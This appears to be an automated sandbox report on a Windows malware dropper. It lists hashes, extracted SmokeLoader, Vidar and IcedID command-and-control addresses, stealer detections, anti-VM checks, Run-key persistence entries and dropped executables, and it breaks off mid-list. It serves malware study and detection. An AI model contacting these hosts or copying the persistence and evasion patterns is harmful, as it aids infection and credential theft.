Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
2710s -
max time network
2716s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 15:55
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20211014
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
icedid
1875681804
enticationmetho.ink
Signatures
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exerundll32.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4804 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5400 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1428 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6244 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7504 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8240 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8436 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8500 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8676 4936 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5380-334-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5380-335-0x0000000000400000-0x000000000043C000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4068 created 2840 4068 WerFault.exe Vo5pWC9v4LM4GIuQjsgwgSyb.exe PID 860 created 1888 860 WerFault.exe ZPIklAxPB6jR82sYubVd1wws.exe PID 3316 created 2744 3316 WerFault.exe iWl5YE6jVqxWhmGtApNhDm2L.exe PID 4516 created 2912 4516 WerFault.exe 0MCyp39H8AxiYTlGcyBfNoUC.exe PID 5600 created 3324 5600 WerFault.exe KtMfKMTyGhGITYlVicMT552T.exe PID 5264 created 1320 5264 WerFault.exe far1gFrhm6HTCSwt7AdHUaXK.exe PID 1668 created 1656 1668 WerFault.exe YkJJP9hUDzrPj8CaQUtFkm4K.exe PID 1524 created 3004 1524 WerFault.exe 6VJcPvgbLTEnL3gyVOmcMDK4.exe PID 1544 created 4964 1544 WerFault.exe rundll32.exe PID 4676 created 5720 4676 WerFault.exe 981C.exe PID 2716 created 3964 2716 WerFault.exe E7C5.exe PID 4500 created 13216 4500 WerFault.exe GcleanerEU.exe PID 1848 created 2464 1848 GcleanerEU.exe PID 2044 created 4288 2044 WerFault.exe gcleaner.exe PID 6192 created 4120 6192 WerFault.exe gcleaner.exe PID 6304 created 6264 6304 WerFault.exe rundll32.exe PID 7696 created 7584 7696 WerFault.exe rundll32.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
regsvr32.exedescription pid process target process PID 6460 created 6424 6460 regsvr32.exe msedge.exe -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral4/memory/1888-209-0x0000000000E80000-0x0000000000F56000-memory.dmp family_vidar behavioral4/memory/2912-238-0x0000000000E20000-0x0000000000EF6000-memory.dmp family_vidar behavioral4/memory/1540-268-0x000000001CCA0000-0x000000001CD78000-memory.dmp family_vidar C:\Users\Admin\AppData\Local\Temp\build.exe family_vidar C:\Users\Admin\AppData\Local\Temp\build.exe family_vidar -
Blocklisted process makes network request 40 IoCs
Processes:
MsiExec.exeflow pid process 656 8848 MsiExec.exe 670 8848 MsiExec.exe 689 8848 MsiExec.exe 723 8848 MsiExec.exe 747 8848 MsiExec.exe 752 8848 MsiExec.exe 759 8848 MsiExec.exe 777 8848 MsiExec.exe 788 8848 MsiExec.exe 808 8848 MsiExec.exe 837 8848 MsiExec.exe 858 8848 MsiExec.exe 882 8848 MsiExec.exe 897 8848 MsiExec.exe 909 8848 MsiExec.exe 917 8848 MsiExec.exe 928 8848 MsiExec.exe 934 8848 MsiExec.exe 937 8848 MsiExec.exe 948 8848 MsiExec.exe 971 8848 MsiExec.exe 984 8848 MsiExec.exe 1001 8848 MsiExec.exe 1013 8848 MsiExec.exe 1016 8848 MsiExec.exe 1023 8848 MsiExec.exe 1030 8848 MsiExec.exe 1034 8848 MsiExec.exe 1044 8848 MsiExec.exe 1061 8848 MsiExec.exe 1077 8848 MsiExec.exe 1098 8848 MsiExec.exe 1120 8848 MsiExec.exe 1122 8848 MsiExec.exe 1125 8848 MsiExec.exe 1127 8848 MsiExec.exe 1137 8848 MsiExec.exe 1144 8848 MsiExec.exe 1150 8848 MsiExec.exe 1167 8848 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DYbALA.exeWerFault.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts WerFault.exe -
Executes dropped EXE 64 IoCs
Processes:
qpVL2ZesZ5Dciz3WyY2qTUz4.exedcXxD_mTLuOWLK7yvm0uWiKh.exeKtMfKMTyGhGITYlVicMT552T.exeZPIklAxPB6jR82sYubVd1wws.exe4svaL_6jcYHnI8EWxQv_ARQo.exeD9dd_RETOj4JIUabpjwAT2fp.exe5VZS13s3WByVbE4ADMVZQJD5.exeiWl5YE6jVqxWhmGtApNhDm2L.exeoRqxkgsixdTQLGlCw_wScXlE.exeKzQ4K19_9XrJ2mdTwpnysCw4.exeVo5pWC9v4LM4GIuQjsgwgSyb.exe0MCyp39H8AxiYTlGcyBfNoUC.exeXBgLhb2BNUFW643gBLl6EQvv.exe5igv91LvXCMygMPp1mBVXES6.exe_HVkO6KridfpAFsxSd4xBRC_.exenGKKAdD43ozQJDv8K6QWTxN0.exeG51K2QNgA1moFPDcsqFsEuBz.exefar1gFrhm6HTCSwt7AdHUaXK.exeXQXdH_5JuxvMmlvSZF2UGNpF.exe_v1u23KhcxVvki0UuinAXhKa.exeLmzy936RB1QfVboFo4pd1_Pn.exeWs4KoXUYMhJwpZIH_OOJR6K8.executm3.exeDownFlSetup999.exeG51K2QNgA1moFPDcsqFsEuBz.exeinst3.exeWs4KoXUYMhJwpZIH_OOJR6K8.tmpmtbexzZhTysSDvFdfX8ZurDu.exeKtMfKMTyGhGITYlVicMT552T.exeextd.exebuild.exe6780841.exeG3yhd3bJJbP04w8gmz860v7W.exeDYbALA.exe6035907.exe_v1u23KhcxVvki0UuinAXhKa.exe8pWB.eXEXNzIcv2Kkl8zVywu80iKVE8U.exe1380456.exeextd.exeKSYXHNTmRqvS6Y0tsYgqtLKS.exeYkJJP9hUDzrPj8CaQUtFkm4K.exerrC17Jxann9wXbNQOrrI4sZa.exeextd.exe6VJcPvgbLTEnL3gyVOmcMDK4.exe8292732.exeVgPCyYrKaciomQNCsBVgxTDM.exe5077839.exedEq6aoQFJyDc30_OysF9fzTL.exeKhfMcFjZeLr5yaBalfDo9zyX.exeAkBj2Qb1oMtZ1Gs927Ft3ji8.exeVgPCyYrKaciomQNCsBVgxTDM.tmp8225910.exekPBhgOaGQk.exe1435.exeWerFault.exe18.exeTransmissibility.exeextd.exe1435.exeWinHoster.exe5igv91LvXCMygMPp1mBVXES6.exesetup.exesvchost.exepid process 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 1540 dcXxD_mTLuOWLK7yvm0uWiKh.exe 1976 KtMfKMTyGhGITYlVicMT552T.exe 1888 ZPIklAxPB6jR82sYubVd1wws.exe 1904 4svaL_6jcYHnI8EWxQv_ARQo.exe 2096 D9dd_RETOj4JIUabpjwAT2fp.exe 1672 5VZS13s3WByVbE4ADMVZQJD5.exe 2744 iWl5YE6jVqxWhmGtApNhDm2L.exe 3212 oRqxkgsixdTQLGlCw_wScXlE.exe 3440 KzQ4K19_9XrJ2mdTwpnysCw4.exe 2840 Vo5pWC9v4LM4GIuQjsgwgSyb.exe 2912 0MCyp39H8AxiYTlGcyBfNoUC.exe 720 XBgLhb2BNUFW643gBLl6EQvv.exe 3168 5igv91LvXCMygMPp1mBVXES6.exe 4044 _HVkO6KridfpAFsxSd4xBRC_.exe 3196 nGKKAdD43ozQJDv8K6QWTxN0.exe 4388 G51K2QNgA1moFPDcsqFsEuBz.exe 1320 far1gFrhm6HTCSwt7AdHUaXK.exe 2348 XQXdH_5JuxvMmlvSZF2UGNpF.exe 4276 _v1u23KhcxVvki0UuinAXhKa.exe 808 Lmzy936RB1QfVboFo4pd1_Pn.exe 2372 Ws4KoXUYMhJwpZIH_OOJR6K8.exe 4376 cutm3.exe 4760 DownFlSetup999.exe 3076 G51K2QNgA1moFPDcsqFsEuBz.exe 2420 inst3.exe 4704 Ws4KoXUYMhJwpZIH_OOJR6K8.tmp 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 3324 KtMfKMTyGhGITYlVicMT552T.exe 5152 extd.exe 5408 build.exe 5452 6780841.exe 5504 G3yhd3bJJbP04w8gmz860v7W.exe 5536 DYbALA.exe 5608 6035907.exe 5380 _v1u23KhcxVvki0UuinAXhKa.exe 5928 8pWB.eXE 1976 XNzIcv2Kkl8zVywu80iKVE8U.exe 5144 1380456.exe 5308 extd.exe 3924 KSYXHNTmRqvS6Y0tsYgqtLKS.exe 1656 YkJJP9hUDzrPj8CaQUtFkm4K.exe 4664 rrC17Jxann9wXbNQOrrI4sZa.exe 1592 extd.exe 3004 6VJcPvgbLTEnL3gyVOmcMDK4.exe 2668 8292732.exe 3376 VgPCyYrKaciomQNCsBVgxTDM.exe 4480 5077839.exe 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 340 KhfMcFjZeLr5yaBalfDo9zyX.exe 6072 AkBj2Qb1oMtZ1Gs927Ft3ji8.exe 6080 VgPCyYrKaciomQNCsBVgxTDM.tmp 1440 8225910.exe 5244 kPBhgOaGQk.exe 3128 1435.exe 5180 WerFault.exe 580 18.exe 4928 Transmissibility.exe 5912 extd.exe 1844 1435.exe 5132 WinHoster.exe 1040 5igv91LvXCMygMPp1mBVXES6.exe 2036 setup.exe 1404 svchost.exe -
Modifies Installed Components in the registry 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe upx -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
svchost.exe_HVkO6KridfpAFsxSd4xBRC_.exe4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exemsedge.exeoRqxkgsixdTQLGlCw_wScXlE.exe1380456.exe808C.exenGKKAdD43ozQJDv8K6QWTxN0.exe4svaL_6jcYHnI8EWxQv_ARQo.exe8292732.exe5VZS13s3WByVbE4ADMVZQJD5.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _HVkO6KridfpAFsxSd4xBRC_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oRqxkgsixdTQLGlCw_wScXlE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1380456.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 808C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nGKKAdD43ozQJDv8K6QWTxN0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nGKKAdD43ozQJDv8K6QWTxN0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oRqxkgsixdTQLGlCw_wScXlE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1380456.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8292732.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8292732.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _HVkO6KridfpAFsxSd4xBRC_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5VZS13s3WByVbE4ADMVZQJD5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5VZS13s3WByVbE4ADMVZQJD5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 808C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4svaL_6jcYHnI8EWxQv_ARQo.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exemsedge.exe4svaL_6jcYHnI8EWxQv_ARQo.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine 4svaL_6jcYHnI8EWxQv_ARQo.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine 4svaL_6jcYHnI8EWxQv_ARQo.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine msedge.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine 4svaL_6jcYHnI8EWxQv_ARQo.exe -
Loads dropped DLL 64 IoCs
Processes:
Ws4KoXUYMhJwpZIH_OOJR6K8.tmpmtbexzZhTysSDvFdfX8ZurDu.exedEq6aoQFJyDc30_OysF9fzTL.exeVgPCyYrKaciomQNCsBVgxTDM.tmpsetup.exerundll32.exemsiexec.exeinstaller.exeautosubplayer.exerundll32.exeMsiExec.exeautosubplayer.exemsiexec.exerundll32.exeMsiExec.exeCalculator.exeCalculator.exeCalculator.exeMsiExec.exepid process 4704 Ws4KoXUYMhJwpZIH_OOJR6K8.tmp 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 6080 VgPCyYrKaciomQNCsBVgxTDM.tmp 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 5800 dEq6aoQFJyDc30_OysF9fzTL.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 2036 setup.exe 2036 setup.exe 4964 rundll32.exe 2752 msiexec.exe 2752 msiexec.exe 13044 installer.exe 13044 installer.exe 1584 autosubplayer.exe 13044 installer.exe 6264 rundll32.exe 6316 MsiExec.exe 6316 MsiExec.exe 6596 autosubplayer.exe 1584 autosubplayer.exe 6740 msiexec.exe 6740 msiexec.exe 7584 rundll32.exe 8848 MsiExec.exe 6596 autosubplayer.exe 8848 MsiExec.exe 8848 MsiExec.exe 8848 MsiExec.exe 8848 MsiExec.exe 8848 MsiExec.exe 8848 MsiExec.exe 2036 setup.exe 2036 setup.exe 9472 Calculator.exe 9472 Calculator.exe 9472 Calculator.exe 2036 setup.exe 8848 MsiExec.exe 2036 setup.exe 1584 autosubplayer.exe 2012 mtbexzZhTysSDvFdfX8ZurDu.exe 1584 autosubplayer.exe 8848 MsiExec.exe 8848 MsiExec.exe 13044 installer.exe 8848 MsiExec.exe 8848 MsiExec.exe 10648 Calculator.exe 10708 Calculator.exe 10952 MsiExec.exe 10952 MsiExec.exe 6596 autosubplayer.exe 8848 MsiExec.exe 6596 autosubplayer.exe 1584 autosubplayer.exe 6596 autosubplayer.exe 1584 autosubplayer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe themida C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe themida C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe themida behavioral4/memory/3196-286-0x00000000000D0000-0x00000000000D1000-memory.dmp themida behavioral4/memory/1672-281-0x0000000000130000-0x0000000000131000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
Processes:
5077839.exe4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exesetup.exesetup.exeDYbALA.exesetup.exemsedge.exeWerFault.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5077839.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\dot3gpui\\conhost.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Public\\Documents\\My Pictures\\WmiPrvSE.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Downloaded Program Files\\winlogon.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Jashihodehy.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\qcap\\fontdrvhost.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\CoreUIComponents\\dllhost.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\AppxSignature\\StartMenuExperienceHost.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\SysWOW64\\KBDINBE2\\cmd.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sppsvc.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Dushuxarocae.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\System32\\msdxm\\winlogon.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\foldershare = "\"C:\\Program Files\\Windows Media Player\\QVDBDFUGTJ\\foldershare\\foldershare.exe\"" 4svaL_6jcYHnI8EWxQv_ARQo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
5VZS13s3WByVbE4ADMVZQJD5.exe1380456.exe8292732.exesvchost.exe_HVkO6KridfpAFsxSd4xBRC_.exe808C.exeoRqxkgsixdTQLGlCw_wScXlE.exenGKKAdD43ozQJDv8K6QWTxN0.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5VZS13s3WByVbE4ADMVZQJD5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1380456.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8292732.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _HVkO6KridfpAFsxSd4xBRC_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 808C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oRqxkgsixdTQLGlCw_wScXlE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nGKKAdD43ozQJDv8K6QWTxN0.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\K: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) 